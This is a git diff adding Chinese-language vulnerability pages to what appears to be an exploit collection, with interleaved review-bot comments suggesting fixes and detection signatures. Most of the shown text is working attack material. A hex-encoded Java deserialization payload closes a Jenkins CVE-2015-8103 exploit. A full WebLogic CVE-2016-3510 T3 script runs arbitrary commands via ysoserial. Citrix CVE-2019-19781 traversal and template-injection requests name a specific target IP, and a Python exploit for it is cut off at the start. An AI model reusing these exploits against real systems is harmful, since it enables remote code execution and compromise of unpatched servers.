e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x00\x00\x00\x00\x00\x00\x00\x01\x03\x00\x05\x5a\x00\x14\x61\x75\x74\x6f\x55\x6e\x65\x78\x70\x6f\x72\x74\x42\x79\x43\x61\x6c\x6c\x65\x72\x5a\x00\x09\x67\x6f\x69\x6e\x67\x48\x6f\x6d\x65\x49\x00\x03\x6f\x69\x64\x5a\x00\x09\x75\x73\x65\x72\x50\x72\x6f\x78\x79\x4c\x00\x06\x6f\x72\x69\x67\x69\x6e\x71\x00\x7e\x00\x0d\x78\x70\x00\x00\x00\x00\x00\x02\x00\x73\x7
1\x00\x7e\x00\x0b\x71\x00\x7e\x00\x43\x74\x00\x78\x50\x72\x6f\x78\x79\x20\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x40\x32\x20\x77\x61\x73\x20\x63\x72\x65\x61\x74\x65\x64\x20\x66\x6f\x72\x20\x69\x6e\x74\x65\x72\x66\x61\x63\x65\x20\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x75\x71\x00\x7e\x00\x11\x00\x00\x00\x0d\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x7d\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x89\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x74\x00\x04\x77\x72\x61\x70\x73\x71\x00\x7e\x00\x13\x00\x00\x02\x6a\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x74\x00\x06\x65\x78\x70\x6f\x72\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x02\xa6\x74\x00\x21\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x74\x00\x16\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x4a\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x46\x71\x00\x7e\x00\x1d\x71\x00\x7e\x00\x1e\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x03\x08\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x71\x00\x7e\x00\x22\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xfa\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x71\x00\x7e\x00\x28\x70\x71\x00\x7e\x00\x29\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x71\x00\x7e\x00\x2b\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x71\x00\x7e\x00\x30\x71\x00\x7e\x00\x31\x71\x00\x7e\x00\x32\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x34\x73\x71\x00\x7e\x0
0\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x36\x71\x00\x7e\x00\x3a\x78\x78\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00\x07\x46\xac\xed\x00\x05\x73\x72\x00\x32\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x24\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\x49\x00\x03\x6f\x69\x64\x5b\x00\x09\x61\x72\x67\x75\x6d\x65\x6e\x74\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x05\x74\x79\x70\x65\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x77\x08\xff\xff\xff\xfe\x00\x00\x00\x02\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x49\x00\x02\x69\x64\x49\x00\x08\x6c\x61\x73\x74\x49\x6f\x49\x64\x4c\x00\x08\x72\x65\x73\x70\x6f\x6e\x73\x65\x74\x00\x1a\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x73\x70\x6f\x6e\x73\x65\x3b\x77\x04\x00\x00\x00\x00\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x09\x63\x72\x65\x61\x74\x65\x64\x41\x74\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3b\x77\x04\x00\x00\x00\x00\x78\x70\x73\x72\x00\x1e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x24\x53\x6f\x75\x72\x63\x65\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x06\x74\x68\x69\x73\x24\x30\x74\x00\x19\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3b\x77\x04\x0
0\x00\x00\x00\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a\x3b\x1c\xc4\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x71\x00\x7e\x00\x02\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x77\x04\xff\xff\xff\xfd\x78\x70\x71\x00\x7e\x00\x10\x70\x75\x72\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x02\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x0b\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x61\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x04\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73\x71\x00\x7e\x00\x02\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x02\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x02\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x43\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x74\x00\x0c\x43\x6f\x6d\x6d\x61\x6e\x64\x2e\x6a\x61\x76\x61\x74\x00\x06\x3c\x69\x6e\x69\x74\x3e\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x32\x71\x00\x7e\x00\x15\x71\x00\x7e\x00\x16\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x63\x74\x00\x1
7\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x74\x00\x0c\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x02\x39\x74\x00\x32\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x24\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x74\x00\x1c\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xf6\x74\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x71\x00\x7e\x00\x1e\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x24\x50\x72\x6f\x78\x79\x31\x70\x74\x00\x0f\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x68\x61\x6e\x6e\x65\x6c\x74\x00\x0c\x43\x68\x61\x6e\x6e\x65\x6c\x2e\x6a\x61\x76\x61\x74\x00\x15\x77\x61\x69\x74\x46\x6f\x72\x52\x65\x6d\x6f\x74\x65\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x74\x00\x0e\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x74\x00\x08\x43\x4c\x49\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x74\x00\x1f\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x19\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x2e\x6a\x61\x76\x61\x74\x00\x07\x63\x6f\x6e\x6e\x65\x63\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2a\x71\x00\x7e\x00\x2b\x74\x00\x05\x5f\x6d\x61\x69\x6e\x73\x71\x00\x7e\x00\x13\x00\x00\x0
1\x86\x71\x00\x7e\x00\x2a\x71\x00\x7e\x00\x2b\x74\x00\x04\x6d\x61\x69\x6e\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x4c\x69\x73\x74\xfc\x0f\x25\x31\xb5\xec\x8e\x10\x02\x00\x01\x4c\x00\x04\x6c\x69\x73\x74\x71\x00\x7e\x00\x0f\x77\x04\xff\xff\xff\xfd\x78\x72\x00\x2c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x19\x42\x00\x80\xcb\x5e\xf7\x1e\x02\x00\x01\x4c\x00\x01\x63\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x3b\x77\x04\xff\xff\xff\xfd\x78\x70\x73\x72\x00\x13\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x41\x72\x72\x61\x79\x4c\x69\x73\x74\x78\x81\xd2\x1d\x99\xc7\x61\x9d\x03\x00\x01\x49\x00\x04\x73\x69\x7a\x65\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x00\x77\x04\x00\x00\x00\x00\x78\x71\x00\x7e\x00\x39\x78\x71\x00\x7e\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x70\x00\x00\x00\x01\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x01\x74\x00\x18\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x6c\x69\x45\x6e\x74\x72\x79\x50\x6f\x69\x6e\x74\x71\x00\x7e\x00\x24\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x01\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x74\x00\x1d\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x28\x31\x2c\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x29'
+
+sock.send(payload)
+print('[+] Sent payload')
+```
+
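Review bot: The page title on the first added line is a second-level heading (`## Jenkins远程代码执行漏洞 CVE-2015-8103`), while the other pages in this patch open with `#` and this same commit corrects a heading level in the Tomcat AJP page; it should be `# Jenkins 远程代码执行漏洞 CVE-2015-8103`, matching the file name. The description phrase `执行有问题的commons-collections` reads as a mistranslation; something like `通过精心构造的序列化Java对象(与存在问题的commons-collections库有关)执行任意代码` would be clearer. Since the listing learns the CLI listener port from the `X-Jenkins-CLI-Port` response header and then opens a raw TCP connection to it, the page should also tell operators to keep that port unreachable from untrusted networks until the instance is upgraded to the fixed releases named in the description.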
diff --git a/Web服务器漏洞/WebLogic T3 反序列化漏洞 CVE-2016-3510.md b/Web服务器漏洞/WebLogic T3 反序列化漏洞 CVE-2016-3510.md
new file mode 100644
index 0000000..325ba9e
--- /dev/null
+++ b/Web服务器漏洞/WebLogic T3 反序列化漏洞 CVE-2016-3510.md
@@ -0,0 +1,92 @@
+# WebLogic T3 反序列化漏洞 CVE-2016-3510
+
+## 漏洞描述
+
+CVE-2016-3510漏洞是对CVE-2015-4852漏洞修复的绕过,攻击者在可以通过该漏洞实现远程命令执行。
+
+## 漏洞影响
+
+```
+Oracle WebLogic Server 12.2.1.0
+Oracle WebLogic Server 12.1.3.0
+Oracle WebLogic Server 12.1.2.0
+Oracle WebLogic Server 10.3.6.0
+```
+
+## 漏洞EXP
+
+```python
+#!/usr/bin/env python2
+
+#Oracle WebLogic Server Java Object Deserialization RCE (CVE-2016-3510)
+#Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits)
+#Made with <3 by @byt3bl33d3r
+
+from __future__ import print_function
+import socket
+import struct
+import argparse
+import os
+import sys
+from subprocess import check_output
+
+ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
+ysoserial_path = None
+
+parser = argparse.ArgumentParser()
+parser.add_argument('target', type=str, help='Target IP:PORT')
+parser.add_argument('command', type=str, help='Command to run on target')
+parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')
+
+if len(sys.argv) < 2:
+ parser.print_help()
+ sys.exit(1)
+
+args = parser.parse_args()
+
+if not args.ysoserial_path:
+ for path in ysoserial_default_paths:
+ if os.path.exists(path):
+ ysoserial_path = path
+else:
+ if os.path.exists(args.ysoserial_path):
+ ysoserial_path = args.ysoserial_path
+
+if len(args.target.split(':')) != 2:
+ print('[-] Target must be in format IP:PORT')
+ sys.exit(1)
+
+if not args.command:
+ print('[-] You must specify a command to run')
+ sys.exit(1)
+
+ip, port = args.target.split(':')
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+print('[*] Target IP: {}'.format(ip))
+print('[*] Target PORT: {}'.format(port))
+
+sock.connect((ip, int(port)))
+
+# Send headers
+headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
+print('[*] Sending header')
+sock.sendall(headers)
+
+data = sock.recv(1024)
+print('[*] Received: "{}"'.format(data))
+
+payloadObj = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])
+
+payload = '\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
+payload += payloadObj
+payload += '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x6
9\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
+
+# adjust header for appropriate message length
+payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:])
+
+print('[*] Sending payload')
+sock.send(payload)
+```
+
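Review bot: The writeup ends at `## 漏洞EXP` and gives defenders nothing to act on; a `## 修复建议` section after the affected-version list is missing. It should say to apply the Oracle Critical Patch Update that fixes CVE-2016-3510 and to limit T3/T3S access to trusted hosts with a WebLogic connection filter. For detection, the script replays a captured handshake verbatim: the header line `PU:t3://us-l-breens:7001` and the same `us-l-breens` hostname in the trailing JVMID bytes are static, so together with the `\xac\xed\x00\x05` serialization magic on the T3 port they make a usable network signature. The description line also has a stray character: `攻击者在可以通过` should read `攻击者可以通过`.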
diff --git a/网络设备漏洞/Citrix 远程命令执行漏洞 CVE-2019-19781.md b/网络设备漏洞/Citrix 远程命令执行漏洞 CVE-2019-19781.md
new file mode 100644
index 0000000..5b79c0f
--- /dev/null
+++ b/网络设备漏洞/Citrix 远程命令执行漏洞 CVE-2019-19781.md
@@ -0,0 +1,107 @@
+# Citrix 远程命令执行漏洞 CVE-2019-19781
+
+## 漏洞描述
+
+Citrix ADC(NetScalers)中的目录穿越错误,这个错误会调用perl脚本,perl脚本用于将XML格式的文件附加到受害计算机,因此产生远程执行代码。
+
+## 漏洞影响
+
+```
+Citrix NetScaler ADC and NetScaler Gateway version 10.5
+Citrix ADC and NetScaler Gateway version 11.1 , 12.0 , 12.1
+Citrix ADC and Citrix Gateway version 13.0
+```
+
+## 漏洞复现
+
+访问 `https://target-ip` 或 `http://target-ip`登录系统,默认用户和密码登录:`nsroot/nsroot`。
+
+利用目录穿越写入命令语句到`newbm.pl`文件中:
+
+```
+POST /vpns/portal/scripts/newbm.pl HTTP/1.1
+Host: target-ip
+Connection: close
+Accept-Encoding: gzip, deflate
+Accept: */*
+User-Agent: python-requests/2.23.0
+NSC_NONCE: nsroot
+NSC_USER: ../../../netscaler/portal/templates/15ffbdca
+Content-Length: 89
+
+url=http://example.com&title=15ffbdca&desc=[% template.new('BLOCK' = 'print `whoami`') %]
+```
+
+
+
+GET方式访问写入的xml文件:
+
+```
+GET /vpns/portal/15ffbdca.xml HTTP/1.1
+Host: 50.202.211.151
+Connection: close
+Accept-Encoding: gzip, deflate
+Accept: */*
+User-Agent: python-requests/2.23.0
+NSC_NONCE: nsroot
+NSC_USER: nsroot
+```
+
+
+
+## 漏洞EXP
+
+```python
+#!/usr/bin/env python
+# https://github.com/mpgn/CVE-2019-19781
+# # #
+
+import requests
+import string
+import random
+import re
+import sys
